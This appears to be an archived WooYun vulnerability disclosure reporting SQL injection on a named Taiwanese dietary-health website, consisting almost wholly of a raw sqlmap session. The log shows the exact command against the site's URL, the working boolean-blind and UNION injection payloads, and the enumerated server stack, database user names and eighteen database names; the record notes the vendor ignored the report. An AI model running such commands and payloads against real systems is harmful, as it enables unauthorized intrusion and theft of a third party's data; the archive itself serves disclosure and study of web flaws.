乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-27: 细节已通知厂商并且等待厂商处理中 2015-04-01: 厂商已经主动忽略漏洞,细节向公众公开
台灣某飲食調養資訊網站SQL Injection
[root@Hacker~]# Sqlmap Sqlmap sqlmap.py -u "http://www.oyoung.com.tw/about/5qa_content.asp?id=79" --dbs --passwords --current-user --current-db --is-dba sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, sta[*] starting at 08:35:40[08:35:40] [INFO] testing connection to the target URL[08:35:42] [INFO] testing if the target URL is stable. This can take a couple of seconds[08:35:45] [INFO] target URL is stable[08:35:45] [INFO] testing if GET parameter 'id' is dynamic[08:35:46] [INFO] confirming that GET parameter 'id' is dynamic[08:35:48] [INFO] GET parameter 'id' is dynamic[08:35:50] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable[08:35:50] [INFO] testing for SQL injection on GET parameter 'id'[08:35:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[08:36:07] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable[08:36:31] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n][08:43:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[08:43:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[08:44:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[08:44:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[08:44:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'[08:44:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[08:44:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[08:44:38] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'[08:44:39] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'[08:44:48] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'[08:44:48] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'[08:44:48] [INFO] testing 'MySQL inline queries'[08:44:48] [INFO] testing 'PostgreSQL inline queries'[08:44:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[08:44:48] [INFO] testing 'Oracle inline queries'[08:44:48] [INFO] testing 'SQLite inline queries'[08:44:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'[08:44:48] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[08:44:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[08:44:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[08:44:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[08:44:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[08:44:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[08:45:07] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'[08:45:30] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'[08:46:00] [INFO] testing 'Oracle AND time-based blind'[08:46:01] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'[08:46:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'[08:46:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'[08:46:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[08:46:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[08:47:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[08:47:13] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range f[08:47:18] [INFO] target URL appears to have 5 columns in query[08:47:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable[08:47:36] [WARNING] applying generic concatenation with double pipes ('||')[08:47:36] [WARNING] parameter length constraint mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expectedGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 70 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=79' AND 3759=3759 AND 'GkgO'='GkgO Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=-2765' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(121)+CHAR(99)+CHAR(113)+CHAR(67)+CHAR(86)+CHAR(81)+CHAR(75)+CHAR(120)+CHAR(117)+CHAR(89)+CHAR(73)+CH---[08:53:23] [INFO] testing MySQL[08:53:24] [WARNING] the back-end DBMS is not MySQL[08:53:24] [INFO] testing Oracle[08:53:28] [WARNING] the back-end DBMS is not Oracle[08:53:28] [INFO] testing PostgreSQL[08:53:28] [WARNING] the back-end DBMS is not PostgreSQL[08:53:28] [INFO] testing Microsoft SQL Server[08:53:29] [INFO] confirming Microsoft SQL Server[08:53:32] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[08:53:32] [INFO] fetching current user[08:53:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestcurrent user: 'newoysa'[08:53:55] [INFO] fetching current databasecurrent database: 'oynewdata2007'[08:53:55] [INFO] testing if current user is DBAcurrent user is DBA: False[08:53:56] [INFO] fetching database users password hashes[08:54:06] [INFO] the SQL query used returns 2 entries[08:54:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[08:54:09] [INFO] fetching database users[08:54:10] [INFO] the SQL query used returns 2 entries[08:54:11] [INFO] fetching number of database users[08:54:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[08:54:11] [INFO] retrieved: 2[08:54:19] [INFO] retrieved: newoysa[08:56:15] [INFO] retrieved: sa[08:56:40] [INFO] fetching number of password hashes for user 'newoysa'[08:56:40] [INFO] retrieved: 0[08:56:57] [WARNING] unable to retrieve the number of password hashes for user 'newoysa'[08:56:57] [INFO] fetching number of password hashes for user 'sa'[08:56:57] [INFO] retrieved: 0[08:57:14] [WARNING] unable to retrieve the number of password hashes for user 'sa'[08:57:14] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system d[08:57:14] [INFO] fetching database names[08:57:14] [INFO] the SQL query used returns 18 entries[08:57:36] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[08:58:04] [INFO] fetching number of databases[08:58:04] [INFO] retrieved: 18[08:58:14] [INFO] retrieved: aspnetdb[08:59:20] [INFO] retrieved: master[09:00:01] [INFO] retrieved: model[09:00:32] [INFO] retrieved: msdb[09:01:24] [INFO] retrieved: oy_ad[09:02:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestcustome[09:03:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestr[09:03:31] [INFO] retrieved: oy_[09:04:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestad[09:04:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestpo[09:05:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requesto[09:06:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestl[09:06:31] [INFO] retrieved: oy_adpool_cn[09:07:56] [INFO] retrieved: oy_message[09:09:25] [INFO] retrieved: oy_message_c[09:11:11] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestn[09:11:32] [INFO] retrieved: oyn[09:12:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestewdata2007[09:14:27] [INFO] retrieved: red2009[09:15:27] [INFO] retrieved: red2009_cn[09:16:38] [INFO] retrieved: Repo[09:17:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestrtSe[09:18:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the requestrver$OYOUNGWEB[09:20:14] [INFO] retrieved: ReportServer$OYOUNGWEBTempDB[09:22:43] [INFO] retrieved: rp3[09:23:00] [INFO] retrieved: rp7[09:23:17] [INFO] retrieved: shop2010[09:24:14] [INFO] retrieved: tempdbavailable databases [18]:[*] aspnetdb[*] master[*] model[*] msdb[*] oy_adcustomer[*] oy_adpool[*] oy_adpool_cn[*] oy_message[*] oy_message_cn[*] oynewdata2007[*] red2009[*] red2009_cn[*] ReportServer$OYOUNGWEB[*] ReportServer$OYOUNGWEBTempDB[*] rp3[*] rp7[*] shop2010[*] tempdb[09:24:53] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 84 times[09:24:53] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\www.oyoung.com.tw'
null
危害等级:无影响厂商忽略
忽略时间:2015-04-01 17:04
暂无